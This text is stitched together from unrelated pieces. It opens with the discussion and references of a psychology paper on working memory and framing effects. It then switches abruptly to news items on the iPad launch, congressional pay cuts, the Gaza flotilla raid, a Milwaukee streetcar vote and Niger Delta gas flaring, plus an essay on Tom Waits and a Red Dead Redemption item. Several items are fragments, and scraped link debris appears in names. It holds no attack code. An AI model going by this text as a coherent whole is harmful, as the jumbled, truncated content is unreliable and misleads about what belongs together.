For example , need - for - cognition , which reflects the extent that people engage in effortful thought and how much they enjoy it , has been shown to influence the strength of the framing effect ( e.g. , Chatterjee , Heath , Milberg & France , 2000 ; Simon , Fagley & Halleran , 2004 ; Smith & Levin , 1996 ; Zhang & Buda , 1999 ) .
Numeracy , a skill variable that tests individuals ’ abilities to do statistical and probabilistic reasoning tasks seems a likely candidate for working memory .
Similar to need - for - cognition , numeracy has also been shown to be a predictor of how prone individuals are to biases and decision making fallacies ( Peters & Levin , 2008 ; Peters et al. , 2006 ) .
One question that deserves further investigation is how our findings may be reconciled with those of Cokely and Kelley ( 2009 ) .
It is clear that the two studies rely on different methodologies , both involving a type of framing , yet producing different findings .
Differentiating specific factors that may be leading to the different findings is beyond the scope of this paper .
However , a couple of factors seem to be reasonable starting points .
First , it would seem prudent to examine whether the equality of expected values among the alternatives interacts with WMC and framing .
Results from Fulginiti and Reyna ( 1993 ) show that , when the expected values for alternatives in the Asian disease problem are slightly unequal ( in a direction opposite to the typical framing preference ) , framing effects diminish .
It may be the case that when equal expected values are presented , as in the Asian disease problem , this allows high WMC participants to “ cancel out ” that part of the alternative comparison and consequently , they may be more influenced by the frame .
Conversely , when unequal expected values are involved , this may lead high WMC participants to focus more on that part of the alternative comparison and less on the frame .
As a result , framing effects may be less robust for high WMC participants .
Another distinction is the format of the decision task ; numeric or verbal .
Specifically , it may be that when the decision task is presented in a numerical format , high WMC participants are focused on the numeric information whereas low WMC participants are unable to process this part of the task as efficiently and focus more on the frame .
Such processing differences should lead low WMC participants to be more influenced by the frame when the task involves numerically based information .
Future research investigating working memory and framing should consider these factors as potential mechanisms for determining the strength and likelihood of the framing effect .
In sum , we have examined the differences that exist in risky - choice decision making between those with higher verses lower cognitive ability , as measured through WMC .
Our results have shown that higher cognitive abilities do not always reflect rational decision making .
Rather than acting in accordance with normative reasoning , the results indicate that higher ability individuals may rely on more thorough encoding and decision making processes ( Baron , 1985 ; Cokely & Kelley , 2009 ) .
Specifically , individuals higher in WMC may rely on gist based memory representations due to differential encoding , leading them toward a more biased decision in the case of traditional risky choice framing problems .
This possibility provides an alternative approach to traditional dual process theories of rationality that focuses on quantitative differences in memory rather than qualitative differences in reasoning in order to predict performance .
References
Baron , J. ( 1985 ) .
Rationality and intelligence .
New York , NY US : Cambridge University Press . Biswas , D. ( 2009 ) .
The effects of option framing on consumer choices : Making decisions in rational versus experiential processing modes .
Journal of Consumer Behavior , 8 , 284–299 .
Chatterjee , S. , Heath , T.B. , Milberg , S.J. , & France , K. R. ( 2000 ) .
The differential processing of price in gains and losses :
The effects of frame and need for cognition .
Journal of Behavioral Decision Making , 13 , 61 – 75 .
Cokely , E. T. , & Kelley , C. M. ( 2009 ) .
Cognitive abilities and superior decision making under risk : A protocol analysis and process model evaluation .
Judgment and Decision Making , 4 , 20 – 33 .
Cokely , E. , Kelley , C. , & Gilchrist , A. ( 2006 ) .
Sources of individual differences in working memory : Contributions of strategy to capacity .
Psychonomic Bulletin & Review , 13 , 991–997 .
Delaney , P. , & Sahakyan , L. ( 2007 ) .
Unexpected costs of high working memory capacity following directed forgetting and contextual change manipulations .
Memory and Cognition , 35 , 1074 –1082 .
Dempster , F. N. ( 1981 ) .
Memory span : sources of individual and developmental differences .
Psychological Bulletin , 89 , 63 –100 .
Dougherty , M. , & Hunter , J. ( 2003 ) .
Hypothesis generation , probability judgment , and individual differences in working memory capacity .
Acta Psychologica , 113 , 263–282 . Epstein , S. , Pacini , R. , Denes - Raj , V. , & Heier , H. ( 1996 ) .
Individual differences in intuitive experiential and analytical - rational thinking styles .
Journal of Personality and Social Psychology , 71 , 390 — 405 .
Evans , J. St. B. T. , & Over , D. E. ( 1996 ) .
Rationality and reasoning .
Hove , UK : Psychology Press .
Fagley , N. , & Miller , P. ( 1997 ) .
Framing effects and arenas of choice : Your money or your life ?.
Organizational Behavior and Human Decision Processes , 71 , 355–373 .
Fulginiti , J. V. & V. F. Reyna . ( 1993 , November ) .
Qualitative versus quantitative processing in decision making : A fuzzy - trace theory analysis .
Paper presented at the annual meeting of the Society for Judgment and Decision Making , Washington , DC .
Igou , E. R. , & Bless , H. ( 2007 ) .
On undesirable consequences of thinking : Framing effects as a function of substantive processing .
Journal of Behavioral Decision Making , 20 , 125 –142 . Kahneman , D. & Frederick , S. ( 2002 ) .
Representativeness revisited : Attribute substitution in intuitive judgment .
pp. 49 –81 in T. Gilovich , D. Griffin , and D. Kahneman [ eds ] .
Heuristics & Biases : The Psychology of Intuitive Judgment .
New York .
Cambridge University Press . Kahneman , D. , & Tversky , A. ( 1979 ) .
Prospect theory :
An analysis of decision under risk .
Econometrica , 47 , 263–291 . Kuhberger , A. , & Tanner , C. ( 2009 ) .
Risky choice framing : Task versions and a comparison of prospect theory and fuzzy trace theory .
Journal of behavioral decision making .
DOI : 10.1002/bdm.656 .
Levin , I. P. , Schneider , S.L. , & Gaeth , G.J. ( 1998 ) .
All frames are not created equal : A typology and critical analysis of framing effects .
Organizational Behavior & Human Decision Processes , 76 , 149 –188 . Luciano , M. , Wright , M. J. , Smith , G. A. , Geffen , G. M. , Geffen , L. B. & Martin , N. G. ( 2001 ) .
Genetic covariance among measures of information processing speed , working memory and IQ .
Behavior Genetics , 31 , 581–592 . McElroy , T. , & Seta , J. J. ( 2003 ) .
Framing effects :
An analytic - holistic perspective .
Journal of Experimental Social Psychology , 39 , 610 –617 .
McNamara , D. , & Scott , J. ( 2001 ) .
Working memory capacity and strategy use .
Memory & Cognition , 29 , 10 – 17 .
Meyers - Leny , J. , & Maheswaran , D. ( 2004 ) .
Exploring message framing outcomes when systematic , heuristic or both types of processing occur .
Journal of Consumer Psychology , 14 , 159 –167 .
Peters , E. , & Levin , I. P. ( 2008 ) .
Dissecting the risky - choice framing effect : Numeracy as an individual - difference factor in weighting risky and riskless options .
Judgment and Decision Making , 3 , 435 –448 .
Peters , E. , Västfjäll , D. , Slovic , P. , Mertz , C. , Mazzocco , K. , & Dickert , S. ( 2006 ) .
Numeracy and decision making .
Psychological Science , 17 , 407–413 .
Reyna , V. F. & C. J. Brainerd . ( 1989 ) .
Fuzzy - trace theory of framing effects in choice .
Presented at the 30th Annual Meeting of the Psychonomic Society , Atlanta , GA .
Reyna , V.F. , & Brainerd , C.J. ( 1991 ) .
Furzy - trace theory and framing effects in choice : Gist extraction , truncation , and conversion .
Journal of Behavioral Decision Making , 4 , 249 –262 . Reyna , V. , & Brainerd , C. ( 1995 ) .
Fuzzy - trace theory :
An interim synthesis .
Learning and Individual Differences , 7 , 1 –75 .
Reyna , V. F. , & Ellis , S. C. ( 1994 ) .
Fuzzy - trace theory and framing effects in children ’s risky decision making .
Psychological Science , 5 , 275 –279 . Reyna , V. F. , & Farley , F. ( 2006 ) .
Risk and rationality in adolescent decision making : Implications for theory , practice , and public policy .
Psychological Science in the Public Interest , 7 , 1 – 44 .
Simon , A. F. , Fagley , N.S. , & Halleran , J.G. ( 2004 ) .
Decision framing : Moderating effects of individual differences and cognitive processing .
Journal of Behavioral Decision Making , 17 , 77–93 .
Sloman , S. A. ( 1996 ) .
The empirical case for two systems of reasoning .
Psychological Bulletin , 119 , 3 — 22 .
Smith , S. M. , & Levin , I.P. ( 1996 ) .
Need for cognition and choice in framing effects .
Journal of Behavioral Decision Making , 9 , 283–290 .
Stanovich , K. ( 1999 ) .
Who is rational ? : Studies of individual differences in reasoning .
Mahwah , NJ US : Lawrence Erlbaum Associates Publishers .
Stanovich , K. E. ( 2008 ) .
Higher - order preferences and the master rationality motive .
Thinking & Reasoning , 14 , 111 –127 .
Stanovich , K. E. , & West , R. F. ( 1998 ) .
Individual differences in rational thought .
Journal of Experimental Psychology : General , 127 , 161 –188 .
Stanovich , K. E. , & West , R. F. ( 1999 ) .
Discrepancies between normative and descriptive models of decision making and the understanding / acceptance principle .
Cognitive Psychology , 38 , 349–385 .
Stanovich , K. E. , & West , R. F. ( 2000 ) .
Individual differences in reasoning : Implications for the rationality debate ?
Behavioral and Brain Science , 23 , 645 –726 .
Stanovich , K. E. , & West , R. F. ( 2008 ) .
On the relative independence of thinking biases and cognitive ability .
Journal of Personality and Social Psychology , 94 , 672–695 .
Turley - Ames , K. , & Whitfield , M. M. ( 2003 ) .
Strategy training and working memory task performance .
Journal of Memory & Language , 49 , 446–468 .
Turner , M. L. , & Engle , R. W. ( 1989 ) .
Is working memory capacity task dependent ?
Journal of Memory & Language , 28 , 127–154 .
Tversky , A. , & Kahneman , D. ( 1981 ) .
The framing of decisions and the psychology of choice .
Science , 211 , 453–458 .
Unsworth , N. , Heitz , R. P. , Schrock , J. C. , & Engle , R. W. ( 2005 ) .
An automated version of the operation span task .
Behavior Research Methods , 37 , 498–505 .
Zhang , Y. , & Buda , R. ( 1999 ) .
Moderating effects of need for cognition on responses to positively versus negatively framed advertising messages .
Journal of Advertising , 28 , 1 –15 .
After months of rumor - slinging and hand - wringing , the Apple iPad arrived on store shelves this weekend , and for the most part , the tech press is impressed .
David Pogue called it " a brilliant machine , a category - creator , a joy to use . "
Walt Mossberg noted that " Apple ’s custom processor makes it wicked fast . "
And over at PC Mag , one reviewer said that the Apple iPad " will undoubtedly be a driving force in shaping the emerging tablet landscape . "
But at least one party was n't won over .
Apple " is not having an impact on Nintendo when you look at our business , our volume , our hardware , our software , " Nintendo of America president Reggie Fils - Aime recently told the gaming blog Kotaku .
" I 've seen data that suggestions that while consumers are constantly downloading apps , they play with them for a few times and then they are moving on to the next thing .
Fils - Aime was responding to a suggestion that the Apple iPad , with its sleek 9.7 - inch LED screen , could cut into a market traditionally dominated by Nintendo and Sony .
And why not ?
The machine is a good fit for the casual gamer – hardcore fanboys would obviously look elsewhere – and the accelerometer and 1GHz processor will make many games a joy to play .
Furthermore , the App Store has the power to revolutionize the gaming landscape : no longer will gamers be chained to selections from the top publishers .
They could also choose from programs created by amateur developers in Kansas , or a small start - up in Boston .
Fils - Aime was having none of it .
" Clearly it does n't look like their platform is a viable profit platform for game development because so many of the games are free versus paid downloads , " he said .
Do you have an iPad ?
Or are you consider purchasing one ?
If so , we want to hear from you .
Will you use the Apple iPad primarily as a gaming device ?
Drop us a line in the comments section .
CoreCivic handoff a turning point for reform efforts
Advocates say simply turning the keys over to Sheriff Daron Hall wo n't address the central problems with incarceration and life behind bars .
Rep . Ann Kirkpatrick Ann KirkpatrickArizona Rep. Tom O'Halleran wins Democratic primary Arizona Rep .
Ann Kirkpatrick wins Democratic primary Cook shifts 20 House districts toward Democrats MORE ( D - Ariz . ) is raising the bar on freezing lawmaker salaries this week as she continues her push to garner support for her bill that would cut congressional pay by $ 8,700 next year on top of denying members their automatic cost - of - living increase .
With Congress ’s approval ratings spiraling downward , criticism of government bailouts running rampant and unemployment hovering at 10 percent , a cost - of - living pay increase for lawmakers has become largely unpopular , with many members proposing to follow what they did this year and freeze their own pay again in 2011 .
ADVERTISEMENT
But Kirkpatrick wants to take it a step further and has put forward a measure that would not only halt the automatic pay increase that members get according to law , but also cut their pay by 5 percent next year , which would amount to more than $ 4.7 million in overall savings to taxpayers .
“ Families across the country are getting by on lower wages and finding ways to cut back during the downturn , and these are the folks that pay our salaries , ” said Kirkpatrick in a statement .
“ The federal government ’s budget is in much worse shape , so why should n’t senators and representatives have to feel the same pinch ? ”
Kirkpatrick ’s office said that this would be the first time Congress decreased its pay in 77 years – the last time being in the midst of the Great Depression on April 1 , 1933 .
Her measure has garnered 21 cosponsors so far , since it was introduced last week .
“ It has been 77 years since Congress ’ last pay cut [ and ]
I believe we are long past due for another , ” she said .
The law governing congressional pay raises requires members to vote against getting a raise .
Otherwise , the raise takes effect automatically .
Congressional cost - of - living adjustments are calculated using a formula based on changes in private - sector wages and salaries as measured by the Employment Cost Index .
Since this method began in 1990 , Congress has accepted a raise 13 times and denied itself a pay increase seven times .
The base pay for a House member is $ 174,000 , though leaders earn a higher salary .
The House voted not to give itself a raise in 2009 and again in 2010 .
By rescinding the $ 2,610 salary increase for each member in 2010 ( a 1.5 percent pay increase above current salaries ) , lawmakers saved taxpayers more than $ 1.4 million .
Another $ 2.5 million was saved by preventing the $ 4,700 increase for each member from going into effect in 2009 .
In 2008 , members did not opt to rescind their pay and received a $ 4,100 increase , or 2.5 percent , amounting to more than $ 2.2 million .
More than a dozen members put forward measures that would have rescinded their automatic pay raise for 2010 or required members to vote for their pay raise .
Again , many members have put forward measures to freeze salaries in 2011 , with Reps.
Ron Paul ( R - Texas ) and Harry Mitchell ( D - Ariz . ) leading the charge , while Rep. Nathan Deal ( R - Ga. ) is striving to cut lawmakers ’ pay each year the government runs a deficit .
And Rep. Darrell Issa ( R - Calif . ) wants to scrap the automatic cost - of - living system altogether and establish an independent commission to assess possible pay raises , which would then be subject to an up - or - down vote .
Meanwhile , a bipartisan coalition of lawmakers is pushing to freeze spending on their offices ’ operations until the nation ’s unemployment rate and national debt are lower .
Rep. Dean Heller Dean Arthur HellerOn
The Trail : Democrats plan to hammer Trump on Social Security , Medicare Lobbying World Democrats spend big to put Senate in play MORE ( R - Nev. ) is leading the charge to eliminate any increase in member representational allowance ( MRA ) .
The measure would prohibit an MRA increase in any year that the national unemployment rate is above 6 percent or in any previous fiscal year that the Treasury Department has declared the nation ’s debt more than $ 5.5 trillion .
The mounting support for the freeze comes as Rep. Debbie Wasserman Schultz ( D - Fla . ) , the chairwoman of the Legislative Branch subcommittee on Appropriations , declared last month that any possible raise in the office allowance that members receive next year is expected to be small , adding that this year ’s increase was 1.6 percent .
WASHINGTON ( Reuters ) - President Barack Obama told Israeli Prime Minister Benjamin Netanyahu he deeply regretted the loss of life in an Israeli raid on a Gaza - bound aid flotilla on Monday and urged him to quickly get to the bottom of the incident .
President Barack Obama speaks in the pouring rain during a Memorial Day event at the Abraham Lincoln National Cemetery in Elwood , Illinois , May 31 , 2010 .
REUTERS / Larry Downing
The White House ’s cautious response , which contrasted with an outcry against Israel ’s actions in Europe and the Muslim world , reflected a difficult balancing act for Obama .
He faces international pressure to join condemnation of Israel but must also be mindful that the Jewish state , a close U.S. ally , is popular with American lawmakers and voters .
At the same time , fledgling U.S. - led Israeli -Palestinian peace efforts are at risk of collapse .
“ The president expressed deep regret at the loss of life in today ’s incident , and concern for the wounded , ” the White House said in a summary of Obama ’s phone call with Netanyahu hours after Israeli marines stormed a Turkish aid ship bound for Gaza and at least nine pro-Palestinian activists were killed .
“ The president also expressed the importance of learning all the facts and circumstances around this morning ’s tragic events as soon as possible , ” it said .
Obama , whose relations with Netanyahu have been chilly at times , also told him he understood his decision to cancel their White House talks on Tuesday and return home from a visit to Canada to deal with the crisis .
They agreed to reschedule soon , the White House said .
Israel ’s storming of the aid ship unleashed international outrage over the bloody end to a bid by human rights campaigners to break an Israeli blockade of the Hamas - controlled Gaza Strip .
The U.N. Security Council convened an emergency session on Monday .
Netanyahu said Israeli forces had been attacked while boarding .
In addition to the activists killed , seven troops and 20 protesters were injured , the Israeli military said .
TALKS MEANT TO GIVE NUDGE
“ At this point , it is unclear what happened and there must be a thorough investigation , ” U.S. Senate Foreign Relations Committee Chairman John Kerry said .
“ This unfortunate incident underscores the necessity of resolving the conflict between Israel and the Palestinians . ”
Turkey ’s U.S. ambassador , Namik Tan , pressed for a tougher line with Israel .
“ We would expect our American friends to ... be strongly condemning the Israeli action .
So far we have n’t heard that , ” he told Reuters .
U.S. Secretary of State Hillary Clinton spoke by phone with Israeli Defense Minister Ehud Barak , who provided “ some initial details ” of the incident , her spokesman , P.J. Crowley , said .
The postponement of Netanyahu ’s U.S. visit saved Obama from the awkward choice of taking his guest to task and risking further fraying of ties or avoiding face - to - face criticism and angering Muslim allies like Turkey .
Obama had hoped to use his talks with Netanyahu to give a nudge to indirect U.S. - sponsored peace talks between Israel and the Palestinians and ease any lingering U.S. - Israeli strains over Jewish settlement construction on occupied land .
Getting long - stalled negotiations back under way marked Obama ’s biggest achievement in Middle East diplomacy since taking office last year pledging to make it a high priority .
It is also part of his outreach to the Muslim world , where Obama has sought to counter perceptions of U.S. bias in favor of Israel , especially under his predecessor George W. Bush .
But there has been little or no progress since talks started this month , and with the Gaza flotilla incident , prospects for keeping the process alive look bleak .
Obama will have a chance to try when he hosts Palestinian President Mahmoud Abbas , who called the raid a “ massacre , ” on June 9 .
Potential fallout from the incident poses another big headache for Obama , who is already struggling with a massive Gulf of Mexico oil spill and high unemployment at home and nuclear standoffs with North Korea and Iran abroad .
A study committee voted Thursday to start preliminary engineering on a $ 95.8 million downtown Milwaukee modern streetcar line .
The Milwaukee Connector study committee voted , 3 - 1 , to seek Federal Transit Administration approval for the engineering work on the streetcar , which would link downtown attractions to the lower east side with trips every 10 or 15 minutes , from early morning to late at night , seven days a week , for $ 1 a ride .
Common Council action would still be needed to start construction , probably next year .
But if the federal government approves preliminary engineering , it would be the biggest step yet for a rail transit project in Milwaukee , after the failure of previous plans for light rail and guided electric buses .
The preliminary engineering process would flesh out more financial and operating details of the system .
If approved , construction would start in 2011 and service would start in 2013 .
Mayor Tom Barrett has pushed for the line since 2007 .
Modern streetcars resemble light rail vehicles , run in streets and are powered by overhead electric wires .
The city would use $ 54.9 million in long - unused federal transit aid , matched by $ 9.7 million in tax - incremental financing , to build the initial leg from the downtown Amtrak - Greyhound station to the lower east side .
At the same time , the city is seeking another $ 25 million federal grant , matched by $ 6.5 million in tax - incremental financing , to extend the line north to E. Brady St. and north from the depot to the development at the former Pabst Brewery .
Those extensions would boost operating costs from $ 2.6 million to $ 3.8 million a year .
City officials say fares and state and federal aid would pay most of those costs , with the rest coming from the city parking fund .
Project manager Mark Kaminski said the fixed - route streetcar line would attract downtown economic development in a way that buses do n't .
Kaminski also said modern streetcars can carry more people more efficiently and at lower operating costs than buses .
County member votes no
The only opposition on the four - member study panel came from Brian Dranzik , administration director for the Milwaukee County Department of Transportation and Public Works .
His boss , County Executive Scott Walker , has been a steadfast opponent of rail transit .
Dranzik echoed Walker 's fears that streetcars would steal riders and state aid from the existing Milwaukee County Transit System .
City Public Works Commissioner Jeff Mantes said similar systems in other cities boosted ridership on public buses , rather than competing with them .
Milwaukee Ald. Bob Bauman , whose district would include most of the line , noted later that the streetcar would not duplicate any existing bus route , and the city is not proposing to replace any bus routes .
Mantes said the state transit aid structure would not put the streetcar line in direct competition with the county buses for dollars .
Walker later said it was naïve to believe state and federal aid to the streetcar line would not affect aid to the bus system .
" This will serve a limited , limited number of people , predominantly in the downtown area , and would not help the people who need the greatest help from the bus system , " Walker said in a voice mail .
Together , the initial line and extensions would be within a quarter - mile of every downtown hotel , 91 % of occupied downtown retail space , 90 % of occupied downtown office space , 77 % of downtown housing , and 77 % of downtown parking lots and garages , said Kaminski and City Engineer Jeff Polenske said .
The western extension would serve the Shops of Grand Avenue , Midwest Airlines Center and Bradley Center .
The city is seeking another $ 70 million in federal dollars to extend the line north to the University of Wisconsin - Milwaukee , as well as a separate federal grant to plan future extensions .
Committee members voting in favor of preliminary engineering were panel chairman Pete Beitzel , a vice president of the Metropolitan Milwaukee Association of Commerce ; Wisconsin Center District President Dick Geyer ; and Mantes .
He said : " We have the problem that the people for whom credit is the biggest problem have to pay very high rates .
There are categories of people who are temporarily very short of money for whom we ought to make it easier to borrow .
But alongside what the Conservatives have mentioned - ending the tax preference for debt over equity - it might be worth considering a more direct tax on borrowing . "
Cover of Swordfishtrombones
When one of the members of April Smith ’s band , the Great Picture Show , hauls a small suitcase up on the stage and turns it into a rhythm instrument , slapping it and hitting it with a tambourine , he connects the show to a whole tradition of American displacement and weirdness .
April Smith , whose recent single I can’t stop hearing in my head and whistling to myself , clearly falls into the sub genre of indie- inflected Billie Holiday followers , of young white women jazz singers , like Norah Jones , but there ’s also a pop sensibility and , with the make - shift instrument , a connection to this other , reoccurring element of American music .
We saw it a lot with the “ freak folk ” side of indie music , this injection of strangeness .
Sometimes it was a weird voice , a weird look , weird religious references or references to secret histories , weird stage settings or costume design , though maybe the most common thing was the weird instrument .
In some cases this is a common instrument that just is n’t used in pop music , like Bob Dylan ’s recent use of the accordion or Joanna Newsome ’s harp , and other times it ’s stranger .
Other times it ’s like an instrument you might find moldering in the attic next to Civil War photos , somehow always known and never , historical and imaginary , familiar and so profoundly freakish .
Tom Waits specializes in exuberantly using strange instruments and strange things as instruments : the calliope !
glockenspiel !
harmonium and chromelodeon !
chairs , brake drums and Indonesian seed pods , battery - operated bullhorns and pianos hit with 2x4s !
He started doing this with the album Swordfishtrombones , which , obviously , is named for exactly the kind of instrument that does n’t exist but which , if it did , would be found with owl - eaten mouse carcasses filling the horn end and covered in dust in the attic where the one - legged German immigrant and Union vet would have left it when the band broke up in 1884 and he had to skip town with the sister of one of his wives .
Waits , when he talks about his use of strange sounds , tries to emphasize the diverseness of music , and question what counts as music , and to make a point about the richness of natural sound .
“ I remember I was doing Swordfishtrombones , ” he says , “ and somebody took a stool – a metal stool – and started dragging it across the studio floor to move it out of the way .
And I said , ‘ That ’s really thrilling .
Do that again and abundantly and carefully and repeatedly , please . ' ”
There ’s a sense , here , that the weird instrument is like the musical equivalent of the noble savage .
And there ’s something American about that .
There ’s also , I think , especially with some of the freak folk stuff I find to be annoying and trying too hard , this idea that the make - shift musical instruments bestow an authentic “ something ” upon the proceedings .
That lo-fi and makeshift is always better , always realer .
There is something else to these instruments too , though , something I like a lot and something that made me like April Smith and the Great Picture Show more when I saw the man beating on the little suitcase .
It ’s the sense of displacement , of strangeness .
Of mystery .
The sense that America is , finally , weird and exciting and unknown .
Greil Marcus , writing about Bob Dylan ’s Basement Tapes and the idea of an “ old , weird America , ” says this element of American music is “ an insistence that against every assurance to the contrary , America itself [ is ] a mystery . ”
There is , most of the time and in most fields of American rhetoric , in music and also politics and 12th grade social studies , American studies , the way we normally talk and in our collective memory , the idea that America is simple .
It is knowable and known and uncomplicated .
It can be incorporated into a political message or dismissed by a suburban kid who has spent a semester abroad .
It is simple enough , already so known and intimately familiar , that it does n’t even have to be discussed except for some code words and waves , the names of types and some icons .
Marcus says this is the “ known history ” that , when a weird instrument is played , just dissolves .
“ There is , ” he writes , “ a theme : displacement , restlessness , homelessness , the comic worry of ‘ a people , ’ as Constance Rourke wrote of Americans as they were when the Civil War began , ‘ unacquainted with themselves , strange to the land , unshaped as a nation . ' ”
America is a strange place and we are , still , “ strange to the land . ”
There ’s a temptation to sanitize America , to scrub it up for conventions , but this a place where rich and powerful men like William Randolph Hearst go a little crazy and build nonsensical castles .
This is a place where fortunes have been made on the manufacture of dynamite , and moguls like Howard Hughes become recluses worried about germs and send out underlings to look for clean blood and bring back a sandwich at 2 a.m .
This is where old Quaker heretics have their skulls dug up by newspaper editors and inspire poets to imagine new , American religions , where preachers can make millions on TV , where there are Bibles in every hotel and every state has sites of failed utopias , and former cults and communes .
It ’s cacophony , and , as President James Buchanan once said , cacophony is the “ sound of democracy . ”
America is a weird , weird place , where high school math teachers devote their retirements to trying to debunk Albert Einstein ’s theory of relativity and Einstein ’s brain is kept in a glass jar .
This is a place where lives are still shaped by what ’s on the radio .
Whole cities of people are out on the interstate and tent communities of registered sex offenders have formed under bridges .
We invented jazz and the Klu Klux Klan .
We invented the six - shooter and the celebrity impersonator , support groups and happy hour , slam poetry and art exhibits in airports .
This is a place where slaves could buy themselves and then go on to own others .
We annually reenact Civil War battles , complete with cannons and puffs of dirt and smoke set to explode in fields .
One of our greatest books is about a whale .
Another ’s about fishing for Marlin .
This is fantastic , though , and so much more interesting and fascinating than the flattened version that most of us have in our heads .
It ’s easy to turn America into a jingle , a slick , 30 - second spot with a message that ’s crisp and actionable .
When we say , as we are always saying , what America means , we make it simple and leave the clutter and confusion , the contradictions and craziness .
But America is also cacophony .
America sounds weird .
And that cacophony , it seems to me , can be invoked with a swordfishtrombone .
Displacement might be best played on upside - down plastic paint tubs , or a chair , an old calliope , a Sarrusaphone or a Stroh violin , which is like a violin with a horn appendage attatched .
That mystery and weirdness , the familiar that ’s strange and still unshaped and the known that ’s forgotten but yet felt like the uneasy echo of a fiery , sin-centered sermon , might well fit into the little suitcase that travels with April Smith and the Great Picture Show , getting hauled up on stage and slapped to the beat of a joyous , catchy , quirky song .
Share this :
Share
Pocket
Tumblr
LinkedIn
Reddit
Email
Print
There is an ominous new arrival in the tropical forest outside Yenagoa in the southern Nigerian state of Bayelsa .
It travels on black metal stilts above the green canopy before sinking into a concrete bunker where , when the bulldozers and cranes have finished work , millions of cubic feet of natural gas will be pumped before going up in smoke .
Shell 's Opolo - Epie facility is the newest gas flare in the Niger Delta .
And it gives the lie to claims from oil multinationals and the Nigerian government that they are close to bringing an end to the destructive and wasteful practice of gas flaring .
" This is environmental racism , " said Alagoa Morris , an investigator with a local group , Environmental Rights Action , who regularly risks arrest to monitor activities at the heavily guarded oil and gas installations .
" What we are asking for is that oil companies should have to meet the same standards in Nigeria that they do operating in their own countries . "
The Opolo - Epie plant is set to join at least 100 other flares burning across the swamps , creeks and forests of this oil - producing region , filling the atmosphere with toxins , seeding the clouds with acid rain and polluting the soil .
The gas flares , some of which have been burning constantly since the 1960s , are visible from space .
In a country where more than 60 per cent of the people have no reliable electricity supply , the satellite images show the flares burning more brightly than the lights of Nigeria 's biggest city , Lagos .
Medical studies have shown the gas burners contribute to an average life expectancy in the Delta region of 43 years .
The area also has Nigeria 's highest infant mortality rate – 12 per cent of newborns fail to see out their first year .
The process of burning off unwanted " associated gas " brought up when oil is pumped out of the ground has been illegal in Nigeria since 1984 .
The government has set three separate deadlines for stopping the practice – the latest of which falls due at the end of this year – but still it continues .
While Nigerian officials are claiming record reductions in the amount of gas flared , independent oil and gas experts believe flaring is , in fact , reaching historic highs .
Many observers attribute last year 's much - trumpeted reduction to militancy in the Niger Delta which halved oil production .
" There is an obvious correlation between militancy , reduced oil production and reduced flaring , " explained Joseph Hurstcroft , executive director of Stakeholder Democracy Network , a respected rights group working in the region .
" The figures in the Delta are never clear but we are expecting to see an increase in flaring now that production is back up . "
The Nigerian National Petroleum Corporation ( NNPC ) claims to have reduced flaring to 1.9 billion standard cubic feet ( bscf ) per day , or 30 per cent of total production .
But a confidential report by international energy consultants , seen by The Independent , puts the figure at 2.5 bscf , or 40 per cent of total production .
The scale of the waste is staggering .
If put through a modern , combined - cycle power station , this quantity of natural gas could fuel about a quarter of Britain 's power needs .
It is equivalent to more than one third of the natural gas produced in the UK's North Sea oil and gas fields and would meet the entire energy requirements of German industry .
The pollution generated from this flaring has been measured at up to 50 million tonnes of carbon dioxide , with unknown quantities of the far more damaging greenhouse gas : methane .
What is going on in the Niger Delta is a " continuing economic , political and environmental disaster " , according to Chris Cragg , an independent oil and gas expert .
" It is one of the largest single pointless emissions of greenhouse gas on the planet , with obvious implications for climate change that will not only affect Nigeria , but also the rest of the world . "
Nigeria boasts some of the largest reserves of sweet and easily refined crude oil anywhere on the planet .
Despite the scale of its oil stocks , it has far larger amounts of gas and is sometimes described as a gas province with some oil attached .
Historically , it was the high - value crude which drew companies to the swampy Niger Delta in the 1950s when no one was interested in natural gas .
While other countries have since created markets and infrastructure to utilise the gas , Nigeria has lagged behind , with successive governments content to impose largely meaningless fines on an industry that provides 80 per cent of the nation 's income and more than 90 per cent of its export earnings .
Oil companies such as Shell , Exxon , Chevron and Agip argue that the absence of a domestic market , the imposition of price controls and the high cost of building infrastructure to capture and distribute natural gas have made it economically unviable to end flaring .
They complain that they are forced to operate as minority partners in joint ventures with the NNPC , which consistently fails to provide its share of investment .
The Nigerian government , which has a bill going through the Senate demanding an end to gas flaring at all facilities by 31 December , has in turn blamed the oil majors .
" You will never completely eliminate flaring , " said Bent Svensson , of the global gas flaring reduction unit at the World Bank .
He said the best that could be hoped for was the elimination of " continuous flaring " – the most damaging way to dispose of associated gas .
" That is at least four years away and that assumes everything goes according to plan , and there have been plans and deadlines before , " he added .
Shell told The Independent it had spent $ 3bn since 2001 on a " flares - down " investment programme and insisted that any new plants , including Opolo - Epie , used flares only for safety reasons .
However , the company made an identical spending claim in a public report more than three years ago , suggesting it has either spent nothing in the last three years or that it overstated the level of that investment .
" The companies are not serious at all about ending flaring , " said Nnimmo Bassey , a Nigerian environmental activist who chairs Friends of the Earth International .
" They will never stop gas flaring until the oil wells run dry . "
WHAT IS GAS FLARING ?
* Geology dictates that some of the richest deposits of oil sit together with deposits of natural gas .
Gas flaring is the practice of burning off that natural gas when it is brought to the surface in places where there is no infrastructure to make use of it .
In the 1960s and 70s , " worthless " gas was continuously flared at oil wells from Texas to Saudi Arabia .
At its peak , the practice pumped about 110 million metric tonnes of carbon dioxide to the atmosphere each year — about 0.5 per cent of the world 's carbon dioxide emissions .
If you were n't already excited enough about Red Dead Redemption , hitting UK shops on May 21 , here 's something to tip you over the edge of Anticipation Canyon .
Rockstar has just announced the first piece of downloadable content to accompany the sprawling open - world Western adventure .
Set to be available from June , with a simultaneous release on Xbox Live and the PlayStation Network , ' Outlaws To The End ' is a co-op multiplayer quest , featuring six ' epic ' missions as well as additional multiplayer XP rewards and brand new Achievements and Trophies to unlock .
" With these missions , we wanted to create new ways for players to share in the experience of engaging with this amazing landscape , " commented Rockstar founder , Sam Houser .
The publisher has provided details on three of the stages ...
In Walton 's Gold , you must raid a gold mine and steal its riches from under the noses of the Walton gang , who have rigged the place to explode .
The River , meanwhile , takes the form of a rafting trip toward the rebel stronghold of Nosalida , where the town 's massive weapons cache awaits your liberation .
And in Ammunition , you must gain entry to the besieged town of Tesoro Azul , fending off rebel Gatling guns and sniper fire .
Rockstar says the levels – designed for between 2 - 4 players – will add an ' entirely new dimension ' to the game ; certainly a structured co-op experience always looked to be a glaring ommission from the opening feature - set .
Of course , there is the intriguing Free Roam mode , which gives up to 16 players access to the full singe - player environment , but there are no missions to play through , just lots of lawmen to take out and environmental challenges to attempt .
The Gatling gun .
Apparently , on the river mission you 'll face Mexican rebels who have these mounted on rafts .
